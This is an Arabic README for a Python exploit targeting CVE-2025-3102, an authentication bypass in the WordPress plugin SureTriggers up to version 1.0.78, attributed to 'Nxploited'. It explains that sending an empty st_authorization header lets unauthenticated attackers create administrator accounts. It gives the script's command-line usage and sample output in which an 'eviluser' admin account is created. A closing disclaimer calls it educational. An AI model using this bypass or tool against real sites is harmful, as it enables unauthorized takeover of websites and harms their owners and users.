
Wordpress SureTriggers <= 1.0.78 - تجاوز التفويض بسبب عدم التحقق من القيمة الفارغة يؤدي إلى إنشاء مستخدم إداري دون مصادقة
🚨 CVE-2025-3102 هي ثغرة حرجة لتجاوز المصادقة تؤثر على إضافة SureTriggers: All-in-One Automation Platform الخاصة بـ WordPress، والمثبّتة بنشاط على أكثر من 100,000 موقع ويب. نظرًا لطبيعة الثغرة وحجم النشر، تشكّل هذه الثغرة خطرًا أمنيًا كبيرًا.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:Hإضافة SureTriggers لـ WordPress معرضة لثغرة تجاوز مصادقة تسمح للمهاجمين غير المصادق عليهم بإنشاء حسابات مدير. ويعود السبب إلى التحقق المفقود من القيمة الفارغة على secret_key داخل دالة autheticate_user.
عندما تكون الإضافة مثبّتة ومفعّلة ولكن غير مهيأة بمفتاح API، يمكن للمهاجمين تجاوز المصادقة عن طريق إرسال ترويسة st_authorization فارغة، مما يؤدي إلى تشغيل إجراءات مخصصة للمستخدمين المصادق عليهم.
يتم توفير سكربت بلغة Python لأتمتة استغلال هذه الثغرة.
يسمح لك هذا السكربت بإنشاء مستخدم مدير جديد على المواقع المعرضة للخطر.
readme.txtst_authorization فارغةusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
هذا السكربت مقدّم لأغراض تعليمية فقط.
الاستخدام غير المصرح به لهذا الكود ضد أهداف بدون إذن صريح غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج.
بواسطة: Nxploited ( Khaled Alenazi )